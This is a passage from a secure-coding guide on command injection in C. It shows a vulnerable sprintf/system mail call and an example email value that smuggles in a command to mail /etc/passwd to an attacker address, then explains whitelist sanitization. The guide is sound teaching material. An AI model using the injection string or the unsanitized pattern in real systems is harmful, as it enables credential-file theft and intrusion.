...
Code Block |
---|
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
|
The risk is, of course, that the user enters the following string as an email address:
Code Block |
---|
bogus@addr.com; cat /etc/passwd | mail some@badguy.net |
Compliant Code Solution
It is necessary to ensure that all valid data is accepted while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, white listing can be used to eliminate dangerous characters from the data.
...
The white listing approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. This example, based on the tcp_wrappers
package written by Wietse Venema, illustrates the white listing approach.
...